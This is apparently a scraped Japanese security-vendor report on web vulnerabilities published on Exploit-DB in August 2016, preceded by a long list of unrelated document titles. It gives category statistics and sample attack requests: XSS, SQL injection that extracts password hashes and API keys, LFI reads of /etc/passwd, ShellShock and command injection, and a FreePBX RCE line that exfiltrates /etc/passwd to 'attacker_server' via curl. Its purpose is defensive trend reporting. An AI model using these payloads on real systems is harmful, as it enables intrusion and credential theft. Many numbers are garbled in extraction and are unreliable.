サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site

Similar documents
最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年

最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム



サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センタ

最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

サマリー EDB-Report 最新 Web トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチー

96 8 PHPlot 1. ( 8.1) 4 1: // 2: // $_SERVER[ HTTP_REFERER ]... 3: // $_SERVER[ HTTP_USER_AGENT ]... 4: // $_SERVER[ REMOTE_ADDR ]... ( ) 5: // $_SERV

最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開さ

5-5_arai_JPNICSecSemi_XssCsrf_CM_ PDF

ハピタス のコピー.pages

Copyright 2008 All Rights Reserved 2

相続支払い対策ポイント

150423HC相続資産圧縮対策のポイント

PowerPoint Presentation

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P P.11 P.13 P.15 P.16 P.17 P.17 P.18 P.20 P.21 P.23 P P P P P P P P.31

実施していただく前に

第3回_416.ppt

FileMaker Server 9 Getting Started Guide

% 11.1% +6.% 4, % %+12.2% 54,16 6.6% EV7, ,183 Copyright 216 JAPAN POST GROUP. All Rights Reserved. 1

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P P.11 P.14 P.15 P.16 P.16 P.17 P.19 P.20 P.22 P P P P P P P P P

初心者にもできるアメブロカスタマイズ新2016.pages

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P.10 P.12 P.13 P.14 P.14 P.15 P.17 P.18 P.20 P P P P P.25 P.27 P.28 Copyright 2016 JAPAN POST BA

- 2 Copyright (C) All Rights Reserved.

LAPLINK ヘルプデスク 導入ガイド

WordPress Ktai Style Ktai Entry 18 Mac 18

untitled

内容 エグゼクティブサマリー 攻撃状況の概況 観測手法 収集結果 アカウントに対する攻撃 攻撃概要 攻撃状況 対策 テーマに対する攻撃 攻撃概要...

FileMaker Server Getting Started Guide

WEBシステムのセキュリティ技術

FileMaker Server 9 Getting Started Guide

Copyright All Rights Reserved. -2 -!

P2P? ( )? ( SOX ) ( ) COPYRIGHT 2005 SSH COMMUNICATIONS SECURITY CORP. ALL RIGHTS RESERVED. 2

2

スライド 1

IPA:セキュアなインターネットサーバー構築に関する調査

Microsoft Word - 最終版 バックせどりismマニュアル .docx

PowerPoint プレゼンテーション

shio_ PDF

Cisco® ASA シリーズルーター向けDigiCert® 統合ガイド

Web XXX.XXX.XXX.XXX - - [02/May/2010:12:52: ] "GET /url/url2/page2.htm HTTP/1.1" " "(compatibl

25 About what prevent spoofing of misusing a session information

2 Java 35 Java Java HTML/CSS/JavaScript Java Java JSP MySQL Java 9:00 17:30 12:00 13: 項目 日数 時間 習得目標スキル Java 2 15 Web Java Java J

FileMaker Server Getting Started Guide

クラウド時代のインフラ構成/変更管理とコンプライアンス管理

untitled

脆弱性対策情報データベース JVN ipedia に関する活動報告レポート [2019 年第 3 四半期 (7 月 ~9 月 )] 脆弱性対策情報データベース JVN ipedia に関する活動報告レポートについて 本レポートでは 2019 年 7 月 1 日から 2019 年 9 月 30 日まで

Copyright 2009, SofTek Systems, Inc. All rights reserved.

untitled

別紙 年第 3 四半期脆弱性対策情報データベース JVN ipedia の登録状況 ( 詳細 ) 1. 脆弱性対策情報の登録状況 年第 3 四半期に登録した脆弱性の種類別件数図 8 のグラフは JVN ipedia へ 2012 年第 3 四半期に登録した脆弱性対策情

Copyright Qetic Inc. All Rights Reserved. 2

Releases080909


JP-Secure_labs_Report_Vol.02

Installation and New Features Guide for FileMaker Pro and FileMaker Pro Advanced

FileMaker Server Getting Started Guide

意外と簡単!? Oracle Database 11g -バックアップ・リカバリ編-

SOC Report

untitled

契約№2020-XXXX

Windows Oracle -Web - Copyright Oracle Corporation Japan, All rights reserved.

システム要件 Trend Micro Safe Lock 2.0 SP1 Trend Micro Safe Lock 2.0 SP1 エージェントのシステム要件 OS Client OS Server OS Windows 2000 (SP4) [Professional] (32bit) Wind

82801pdf.pqxp

FileMaker, Inc. All Rights Reserved. FileMaker, Inc Patrick Henry Drive Santa Clara, California FileMaker FileMaker, Inc. FileMa

<Documents Title Here>

健康保険組合のあゆみ_top

リバースマップ原稿2

Adobe Acrobat DC 製品比較表

WIDE 1

WordPress Web

P. 2 P. 4 P. 5 P. 6 P. 7 P. 8 P. 9 P P.11 P.13 P.15 P.16 P.17 P.17 P.18 P.20 P.21 P.23 P P P P P P P.30 16

Copyright 2017 JAPAN POST BANK CO., LTD. All Rights Reserved. 1

意外と簡単!?

EDB-Report 最新Web脆弱性トレンドレポート(07.) 07..0~07.. Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 0

脆弱性対策情報データベース JVN ipedia に関する活動報告レポート [2019 年第 1 四半期 (1 月 ~3 月 )] 脆弱性対策情報データベース JVN ipedia に関する活動報告レポートについて 本レポートでは 2019 年 1 月 1 日から 2019 年 3 月 31 日まで

SOC Report

untitled

VMware View Persona Management

122.pdf

~ アドレス収集くん ~ セキュリティ対策御説明資料

SiteLock操作マニュアル

n n n ( ) n Oracle 16 PostgreSQL 3 MySQL

untitled

チェックしておきたいぜい弱性情報2009< >

Installation and New Features Guide for FileMaker Pro and FileMaker Pro Advanced

Installation and New Features Guide for FileMaker Pro 10 and FileMaker Pro 10 Advanced

Running FileMaker Pro 8 on Windows Server 2003 Terminal Services

OpenRulesモジュール

<Documents Title Here>

= SaaS型総合決済サービス = 「PGマルチペイメントサービス」のご案内

XMLアクセス機能説明書

IM-SecureBlocker

MultiPASS Suite 3.20 使用説明書

Transcription:

06.08

サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site Scripting らの攻撃は単にスクリプトを使用したり イメージタグを使用するなどの攻撃難易度や危険度の側面ではレベルの高い攻撃パターンではありませんでした しかし Cross Site Scripting の攻撃は スクリプトおよび特定タグが実行されると 脆弱な部分に実際の多様なコードが挿入ができる攻撃なので スクリプトおよびタグなどの実行自体ができないようにしなければなりません したがって 脆弱性が発見された該当ソフトウェアを使用する管理者はそのスクリプトおよびイメージタグが実行されるかを確認した後 必ずセキュアコーディングおよびアップデートが必要と考えられます Cross Site Scripting 以外の脆弱性では Linux Bash の脆弱性としてよく知られている ShellShock の脆弱性が発見されました 攻撃パターンは 主に HTTP Header に入り CGI が実行される際 任意の命令語が実行されることができます 04 年に初めて発見された ShellShock の脆弱性は OpenSSL の脆弱性である HeartBleed 脆弱性よりもっと波及力が大きな脆弱性でしたが 現在は Bash Update を最新に実施して 解決することができます 古いバージョンの Linux を使用している管理者であればこのようなセキュリティアップデートを実施し ShellShock と同じ脆弱性に露出されて 規模の大きいセキュリティ事故とつながらないように注意しなければなりません. 脆弱性別件数 脆弱性カテゴリ 件数 ファイルアップロード (File Upload) リモートコマンド実行 (Remote Command Execution) ディレクトリトラバーサル (Directory Traversal) ローカルファイル挿入 (Local File Inclusion:LFI) 4 コマンドインジェクション (Command Injection) 5 SQL インジェクション (SQL Injection) 0 クロスサイトスクリプティング (Cross Site Scripting : XSS) 合計 36 4 0 8 6 4 0 File Upload Remote Command Execution 脆弱性別件数 Directory Traversal 4 LFI 5 Command Injection 0 SQL Injection XSS. 危険度別件数 危険度 件数 割合 早急対応要 3 8% 高 33 9% 合計 36 00% 危険度別件数 3 早急対応要 高 33 3. 攻撃実行の難易度別件数難易度 件数 割合 難 3 6% 中 4% 易 3 65% 合計 49 00% 攻撃実行の難易度別件数 3 難 中 3 易 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 件数 7 5 5 Sakai 4 Nagios Incident Manager NUUO NVRmini FreePBX Navis WebAccess Nagios Log Server PHP Power Browse chatnow phpcollab CMS Davolink Subrion CMS Zabbix WebNMS Framework Server 合計 36 主なソフトウェア別脆弱性発生件数 7 5 5 4 Sakai Nagios Incident Manager NUUO NVRmini FreePBX Navis WebAccess Nagios Log Server PHP Power Browse chatnow phpcollab CMS Davolink

06-08-0 4090 XSS 中高 WordPress WP Live Chat Support Plugin 6..03 - adminajax.php XSS 脆弱性 POST /wp-admin/admin-ajax.php HTTP/. action=wplc_user_send_offline_message&security=8df c9e30&cid=&name=<script>eval(string.fromcharcod e(97, 08, 0, 4, 6, 40, 34, 88, 83, 83, 3, 05, 0, 3, 0, 97, 09, 0, 33, 34, 4, 59));</script>&email=Mail&msg=<script>eval(String.fro mcharcode(97, 08, 0, 4, 6, 40, 34, 88, 83, 83, 3, 05, 0, 3, 09, 5, 03, 33, 34, 4, 59));</script> WordPress WP Live Chat Support Plugin 6..03 06-08-0 4089 SQL Injection 難早急対応要 WordPress Booking Calendar Plugin 6. - SQL Injection POST /wp-admin/admin.php?page=booking%fwpdevbooking.phpwpdevbooking&wh_approved&wh_is_new=&wh_booking_d ate=3&view_mode=vm_listing HTTP/. WordPress Booking Calendar Plugin 6. wh_booking_id=3 AND (SELECT 583 FROM(SELECT COUNT(*),CONCAT(0x776667,(SELECT MID((IFNULL(CAST(user_pass AS CHAR),0x0)),,54) FROM wordpress.wp_users ORDER BY ID LIMIT 0,),0x77a787a7,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) 06-08-05 4006 XSS 中高 WordPress Count per Day Plugin 3.5.4 - / XSS 脆弱性 GET / HTTP/. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 0 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/5.0.704.03 Safari/537.36 Referer: javascript:c=string.fromcharcode;alert(c(83)+c(7)+c( 09)+c(79)+c(0)+c(80)+c(9)+c(0)+c(46)+c(0) +c(08)) WordPress Count per Day Plugin 3.5.4 /scvrtsrv.cmd?action=add&srvname=foobar<iframe% 06-08-05 4005 XSS 易 高 Davolink DV-05 - / XSS 脆弱性 0onload=alert(0)>&srvAddr=9.68..00&proto=,& estart=4444,&eend=4444,istart=4444,&iend=4444, Davolink Davolink DV- 05 06-08-05 4004 LFI 易高 PHP Power Browse. - browse.php LFI 脆弱性 /browse.php?p=source&file=/etc/passwd PHP Power Browse PHP Power Browse. 06-08-05 400 SQL Injection 易高 Subrion CMS 4.0.5 - /admin/database/sql/ SQL POST /admin/database/sql/ HTTP/. Subrion CMS Subrion CMS 4.0.5 query= and =--&show_query= or =-- &exec_query=go Copyright 06 Penta Security Systems Inc. All rights reserved

06-08-06 403 Remote Command Execution 難 早急対応要 NUUO NVRmini 3.0.8 - /cgibin/cgi_system RCE 脆弱性 POST / HTTP/. User-Agent: () { :;}; /bin/ls -al NUUO NVRmini NUUO NVRmini 3.0.8 cmd=ftp_setup&act=modify&com_port=&pasv_port_fr om=04&pasv_port_to=65535&services=enable 06-08-06 40 Command Injection 易高 NUUO NVRmini 3.0.8 - /cgibin/cgi_system Command POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/. NUUO NVRmini NUUO NVRmini 3.0.8 bfolder=%fmtd%fblock3&bfile= ping%0- n%00%0localhost&inc_emap=no&inc_pos=no 06-08-08 408 SQL Injection 易高 phpcollab CMS.5 - /phpcollab/users/emailusers.php?id=%0or%0=-- emailusers.php SQL Injection 脆 &&PHPSESSID=ghtu76jt76nji04lua07930t5 弱性 phpcollab CMS phpcollab CMS.5 06-08-08 406 SQL Injection 易高 /express/shownotice.do?report_type=&gkey= AND 9753=(SELECT Navis WebAccess - UPPER(XMLType(CHR(60) CHR(58) CHR(3) CHR(0 shownotice.do SQL Injection 脆 6) CHR(8) CHR(98) CHR(3) (SELECT (CASE Navis WebAccess 弱性 WHEN (9753=9753) THEN ELSE 0 END) FROM DUAL) CHR(3) CHR(07) CHR(07) CHR(8) CHR( 3) CHR(6))) FROM DUAL) Navis WebAcces 06-08-0 409 Directory Traversal 易高 POST /servlets/fileuploadservlet?filename=../jsp/login.jsp HTTP/. WebNMS Framework Server 5. and 5. SP - /servlets/ Directory Traversal 脆弱性 WebNMS Framework Server WebNMS Framework Server 5. and 5. SP 06-08-5 4037 SQL Injection 易高 Zabbix..x, 3.0.x - latest.php SQL /latest.php?output=ajax&sid=&favobj=toggle&toggle_o pen_state=&toggle_ids[]=5385)%3b%0select%0 *%0from%0users%0where%0(%3D Zabbix Zabbix..x, 3.0.x 06-08-6 404 XSS 易高 - challenges-mgt.jsp XSS 脆弱性 /carbon/identity-mgt/challengesmgt.jsp?addrowid=xss&setname="/><script>alert(docu ment.cookie)</script> Copyright 06 Penta Security Systems Inc. All rights reserved

06-08-6 4040 LFI 易高 - downloadgz-ajaxprocessor.jsp LFI 脆弱性 /carbon/log-view/downloadgzajaxprocessor.jsp?logfile=../../repository/conf/registry.x ml&tenantdomain=&servicename= 06-08-6 405 Command Injection 中高 /nagiosim/reports/download/jpg/mttr/c3rhcnrfzgf0zt0 Nagios Incident Manager.0.0 - ymdeltaltajmvuzf9kyxrlptiwmtytmdutmdymdhl /nagiosim/reports/download/ wzxnbxt0yiiiio3t0b3vjacwvdgwl0zrklmrx07zwnob Command w== Nagios Incident Manager Nagios Incident Manager.0.0 06-08-6 405 SQL Injection 中高 /nagiosna/index.php/api/checks/read?q%5blastcode%5..0 - D=0&o%5Bcol%5D=name%0AND%0(SELECT%0* /nagiosna/index.php/api/checks %0FROM%0(SELECT(SLEEP(5)))UtTW)&o%5Bsort% / SQL 5D=ASC..0 POST /nagioslogserver/api/check/create/ HTTP/. 06-08-6 4050 Command Injection 中高 Nagios Log Server.4. - Multiple Vulnerabilities alert={"name"%3a"stduseralerttest","check_interval"%3a" m","lookback_period"%3a"m","warning"%3a"","critical" %3a"","method"%3a{"type"%3a"exec","path"%3a"/bin/to uch", "args"%3a"/tmp/stduser"},"alert_crit_only"%3a0,"created _by"%3a"stduser","query_id"%3a"avtlgmd- GYGKrkWMo5Tc"} Nagios Log Server Nagios Log Server.4. 06-08-6 405 SQL Injection 難早急対応要 Nagios Incident Manager.0.0 - /nagiosim/admin/settings SQL POST /nagiosim/admin/settings HTTP/. timezone=pacific/samoa' AND (SELECT 533 FROM(SELECT COUNT(*),CONCAT(0x77a7a77,(MID((IFNULL(CAST (DATABASE() AS CHAR),0x0)),,54)),0x770786a7,FLOOR(RAND(0)* ))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ' Nagios Incident Manager Nagios Incident Manager.0.0 06-08-6 405 SQL Injection 中高..0 - /nagiosna/index.php/api/sources/read?o%5bcol%5d=n /nagiosna/index.php/api/source ame%0and%0(select%0*%0from%0(selec s/ SQL # T(SLEEP(5)))UtTW)&o%5Bsort%5D=ASC..0 Copyright 06 Penta Security Systems Inc. All rights reserved

06-08-6 405 SQL Injection 中高..0 - /nagiosna/index.php/admin/ SQL # POST /nagiosna/index.php/admin/globals HTTP/. timezone=us/eastern%' AND (SELECT 4646 FROM(SELECT COUNT(*),CONCAT(0x333,(SELECT MID((IFNULL(CAST(apikey AS CHAR),0x0)),,54) FROM nagiosna_users WHERE id= LIMIT 0,),0x333,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=''..0 06-08-6 405 Command Injection 中高..0 - /nagiosna/index.php/download/report/sourcegroup/test/ /nagiosna/index.php/download/r cvtyawrdptumcvtnawrdpteiiciio3t0b3vjacwvdgwlr eport/sourcegroup/ Command FURGSUxFfTtlYhvICI=..0 06-08-6 405 Command Injection 中高..0 - /nagiosna/index.php/download/report/source/test/cvtya /nagiosna/index.php/download/r WRdPTUmcVtnaWRdPTEiICIiO3t0b3VjaCwvdGwLRFUR eport/source/ Command GSUxFfTtlYhvICI=..0 06-08-6 404 XSS 易高 /carbon/identity-mgt/challenges-mgtfinish.jsp?setname=%%f%3e%3cscript%3ealert %8document.cookie%9%3C%Fscript%3E&questio n0=&question=city+where+you+were+born+%3f&set Id=http%3A%F%Fwso.org%Fclaims%Fchallen gequestion&question=city+where+you+were+born+ %3F&question=Father%7s+middle+name+%3F&setI d=http%3a%f%fwso.org%fclaims%fchalleng equestion&question=father%7s+middle+name+% 3F&question3=Name+of+your+first+pet+%3F&setId3= http%3a%f%fwso.org%fclaims%fchallengequ estion&question3=name+of+your+first+pet+%3f&qu estion4=favorite+sport+%3f&setid4=http%3a%f% - Fwso.org%Fclaims%FchallengeQuestion&question challenges-mgt-finish.jsp XSS 脆 4=Favorite+sport+%3F&question5=Favorite+food+%3F 弱性 # &setid5=http%3a%f%fwso.org%fclaims%fcha llengequestion&question5=favorite+food+%3f&quest ion6=favorite+vacation+location+%3f&setid6=http%3 A%F%Fwso.org%Fclaims%FchallengeQuestion &question6=favorite+vacation+location+%3f&question 7=Model+of+your+first+car+%3F&setId7=http%3A% F%Fwso.org%Fclaims%FchallengeQuestion&que stion7=model+of+your+first+car+%3f&question8=na me+of+the+hospital+where+you+were+born+%3f&set Id8=http%3A%F%Fwso.org%Fclaims%Fchallen gequestion&question8=name+of+the+hospital+wher e+you+were+born+%3f&setid9=%%f%3e%3cscr ipt%3ealert%8document.cookie%9%3c%fscript %3E&question9=XSS 06-08-6 404 XSS 易高 - webapp_info.jsp XSS 脆弱性 /carbon/webapplist/webapp_info.jsp?webappfilename=odata.war&web appstate=all&hostname=victimserver&httpport=9763&defaulthostname=victimserver&webapptype=%/%3e%3cscript%3ealert% 8%7XSS%0hyp3rlinx%0\\n\\n%7%0%bd ocument.cookie%9%3c/script%3e /carbon/ndatasource/newdatasource.jsp?dsname=%o 06-08-6 404 XSS 易高 - newdatasource.jsp XSS 脆弱性 nmousemove=%alert%8%7xss%0by%0hyp3rlinx% 0\\n\\n%7%bdocument.cookie%9&edit=HELL Copyright 06 Penta Security Systems Inc. All rights reserved

06-08-6 404 XSS 易高 - validateconnectionajaxprocessor.jsp 脆弱性 /carbon/ndatasource/validateconnectionajaxprocessor.jsp?&dsname=wso_carbon_db&drive r=com.mysql.jdbc.driver&url=%/%3e%3cscript%3e alert%8666%9%3c/script%3e&username=root&dst ype=rdbms&customdstype=rdbms&dsprovidertype= default&dsclassname=undefined&dsclassname=undefin ed&dsproviderproperties=undefined&editmode=false&c hangepassword=true&newpassword= 06-08-6 404 XSS 易高 - handlers.jsp XSS 脆弱性 /carbon/viewflows/handlers.jsp?retainlastbc=true&flow =in&phase=%/%3e%3cscript%3ealert%8docume nt.cookie%9%3c/script%3e 06-08- 4088 Directory Traversal 易高 POST /wp-admin/admin-ajax.php HTTP/. WordPress 4.5.3 - adminajax.php Directory Traversal 脆弱 性 WordPress 4.5.3 plugin=../../../../../../../../../../dev/random&action=updateplugin 06-08- 4086 File Upload 中高 Sakai 0.7 - / File Upload 脆弱性 POST /sakai-fckconnector/web/editor/filemanager/browser/default/con nectors/jsp/connector/user/admin/?command=fileuplo ad&type=jsp&currentfolder=%fgroup%fportfolioa dmin%f HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=----------- ----------------7dd009908f Sakai Sakai 0.7 -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="test.jsp'-alert()-'foo" Content-Type: application/octet-stream test -----------------------------7dd009908f-- 06-08- 4086 XSS 易高 Sakai 0.7 - /portal/tool/~admin-00/ XSS 脆弱性 /portal/tool/~admin- 00/create_job?_id:job_name=TEST';alert()//&_id%3A _id0=data+warehouse+update&_id:_id4=post&com. sun.faces.view=&_id=_id Sakai Sakai 0.7 06-08- 4086 XSS 易高 Sakai 0.7 - /access/basiclti/site/~admin/axxm4j<img src=a /access/basiclti/site/~admin/ XSS onerror=alert(3)> 脆弱性 Sakai Sakai 0.7 Copyright 06 Penta Security Systems Inc. All rights reserved

06-08- 4086 LFI 易高 Sakai 0.7 - /portal/tool/ LFI 脆弱性 /portal/tool/4fec34b-a47c-4aa5-8786- 3873533f44fa/CvnkzU-3z-QPe7ZiQOA/../WEB- INF/web.xml Sakai Sakai 0.7 06-08-3 4093 XSS 易高 chatnow - login.php XSS 脆弱性 POST /chatnow/login.php/95fb4"><script>alert(45)</script>b 5ca HTTP/. chatnow chatnow 06-08-3 4090 LFI 易高 WordPress Mail Masta Plugin.0 - count_of_send.php LFI 脆弱性 /wp-content/plugins/mailmasta/inc/campaign/count_of_send.php?pl=/etc/passw d WordPress Mail Masta Plugin. 06-08-9 4096 Remote Command Execution 中 高 FreePBX 3.0.35 - config.php RCE 脆弱性 /admin/config.php?display=modules&action=upload&d ownload=0x448&remotemod=http://7.0.0./junk% 6x=$(cat /etc/passwd);curl -d "$x" http://attacker_server:8080/0x448.jnk FreePBX FreePBX 3.0.35 06-08-9 403 SQL Injection 中高 FreePBX 3.0.35 - config.php SQL /admin/config.php?display=f4ris"xor(if(666=666,sle ep(0.03),0))or"*/ FreePBX FreePBX 3.0.35 Copyright 06 Penta Security Systems Inc. All rights reserved